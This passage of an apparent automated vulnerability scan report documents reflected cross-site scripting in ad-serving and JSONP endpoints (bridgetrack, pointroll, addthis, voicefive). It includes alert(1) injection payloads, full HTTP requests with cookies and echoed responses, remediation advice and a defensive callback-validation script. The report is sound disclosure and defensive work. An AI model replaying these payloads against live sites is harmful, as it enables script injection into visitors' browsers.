YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=cb598";alert(1)//c0e3dd2568chttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhu
...[SNIP]...

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks: the server appends query parameters it does not recognise, as name=value, to the click-through URL it writes into the script. The payload 9f316"-alert(1)-"6f5923542da was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Because the reflection here is triggered by a parameter name rather than a value, filtering the values of the known parameters is not enough: unrecognised parameters should be dropped rather than forwarded, and anything that is forwarded must be encoded for the JavaScript string it lands in.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D&9f316"-alert(1)-"6f5923542da=1 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:49 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955470&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=C611BC732A90492BA8B8FFE669900A1F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=24466d163AJUc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=A46B821B06334D749A3994F83C6F626A; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:49 GMT
Connection: close
Content-Length: 4088

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%269f316"-alert(1)-"6f5923542da=1";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf%5FqZXkD4OtlZQCs5%5FthR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6%5F%5F%5F%5F%5FwFgyYaFiYikhBCgAb3
...[SNIP]...

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. That string is the argument to document.write() and consists of an <iframe> tag, so the value also sits inside the single-quoted src attribute of that iframe. The payload 4df7b"%3balert(1)//cbd4ff35fc6 was submitted in the r parameter. This input was echoed as 4df7b";alert(1)//cbd4ff35fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value passes through three contexts in turn (a JavaScript string, HTML markup emitted by document.write(), and a single-quoted URL attribute), so escaping for the JavaScript string alone would still leave the attribute open to a single quote. The r value appears to be a numeric cache-buster (r=0.699075760319829 in the original request) and can simply be validated as a number and rejected otherwise.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.6990757603198294df7b"%3balert(1)//cbd4ff35fc6 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.6990757603198294df7b";alert(1)//cbd4ff35fc6&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks; as with the r parameter in 2.35, that string is an <iframe> tag passed to document.write(), and the value also sits inside the iframe's single-quoted src attribute. The payload 45bbf"-alert(1)-"3da21f59ef8 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The redir value is a redirect target, so encoding it for the script and attribute contexts stops the injection but not an attacker-chosen destination; it should additionally be validated as a URL against an allowlist of expected schemes and hosts before being echoed.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$45bbf"-alert(1)-"3da21f59ef8&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$45bbf"-alert(1)-"3da21f59ef8&time=1|10:39|-5&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks; as in 2.35 and 2.36, that string is an <iframe> tag passed to document.write(), and the value also sits inside the iframe's single-quoted src attribute. The payload 8667f"%3balert(1)//4dd79ad4bda was submitted in the time parameter. This input was echoed as 8667f";alert(1)//4dd79ad4bda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The time value has a fixed shape in the original request (1|10:39|-5) and can be validated strictly against that format; anything that survives validation still needs encoding for both the JavaScript string and the HTML attribute it ends up in.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-58667f"%3balert(1)//4dd79ad4bda&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-58667f";alert(1)//4dd79ad4bda&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is used, unmodified, as the name of the JSONP function that wraps the response body. The payload fcecc<script>alert(1)</script>6208431cf82 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the callback name is not validated at all. Note that the response is served as application/javascript rather than HTML, so a browser that honours the declared type does not parse the <script> tag; in the script context the echoed value is simply a syntax error. The response sets no X-Content-Type-Options: nosniff header, and it is only where a user agent sniffs or otherwise renders the body as HTML that the injected tag executes. The underlying defect, an unrestricted callback name, is the same either way.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down&callback=_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1304951889.1FE|1304955482.1OD|1304951889.60; uid=4dab4fa85facd099; psc=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 09 May 2011 15:39:18 GMT
Content-Length: 127
Connection: close

_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82({"shares":1});

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is used, unmodified, as the name of the JSONP-style function call that makes up the response body. The payload 581d3<script>alert(1)</script>f2d9ac3c949 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the function name is not validated. As in 2.38, the response is served as script (application/x-javascript) and sets no X-Content-Type-Options: nosniff header: in the script context the echoed tag is a syntax error, and it executes only where the body is rendered as HTML.
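For 2.38 and 2.39 the missing control is validation of the callback name. The following is an added example written for this report, not code from AddThis or comScore; the handler shape, the function names, the length limit and the status codes are assumptions. It accepts only a dotted JavaScript identifier path, which both legitimate callbacks seen in this section satisfy and both payloads fail, and it emits the Content-Type and X-Content-Type-Options headers that keep the body from being interpreted as HTML.

```javascript
// Added example for findings 2.38 and 2.39; not code from AddThis or comScore.
// Handler shape, names, length limit and status codes are assumptions.

// A callback is accepted only as a dotted JavaScript identifier path:
// `_ate.cbs.sc_http...` and `COMSCORE.BMX.Broker.handleInteraction` pass;
// anything containing <, >, (, ), quotes, spaces or "//" fails.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LENGTH = 256; // assumed limit, generous for real callbacks

function isValidCallback(name) {
  return typeof name === 'string'
    && name.length <= MAX_CALLBACK_LENGTH
    && CALLBACK_RE.test(name);
}

// Serialises the payload for a script context. JSON is almost valid JS, but
// U+2028/U+2029 were line terminators in older engines, and "<" should never
// reach a script body raw because it is what "</script>" needs.
function jsonForScript(payload) {
  return JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029')
    .replace(/</g, '\\u003c');
}

// Builds the JSONP response as plain data (status, headers, body) so the
// logic can be exercised without an HTTP server.
function jsonpResponse(callback, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=UTF-8',
    // Stops user agents from sniffing the body into HTML when it is
    // navigated to directly; neither response in 2.38/2.39 sends it.
    'X-Content-Type-Options': 'nosniff',
  };
  if (!isValidCallback(callback)) {
    return { status: 400, headers, body: '/* invalid callback */' };
  }
  // Leading comment so the body never begins with caller-chosen bytes.
  return {
    status: 200,
    headers,
    body: '/**/ ' + callback + '(' + jsonForScript(payload) + ');',
  };
}

// Constructed inputs: the two legitimate callbacks and the two payloads from
// this section, plus two other shapes an attacker would try.
const SAMPLES = [
  '_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddown',
  'COMSCORE.BMX.Broker.handleInteraction',
  '_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82',
  'COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949',
  'alert(1)//',
  'a..b',
];

// Returns, for each sample, the status the handler would answer with.
function classify(samples) {
  return samples.map((s) => ({ callback: s, status: jsonpResponse(s, { shares: 1 }).status }));
}

console.log(classify(SAMPLES));
```

Running it with node lists each sample with the status it would receive: the two real callbacks get 200 and the rest 400. The regex is deliberately stricter than what JavaScript allows in an identifier (no Unicode letters, no bracket access); real JSONP callers never need more than this.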

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949&n=ar_int_p97174789&1304955333231 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; 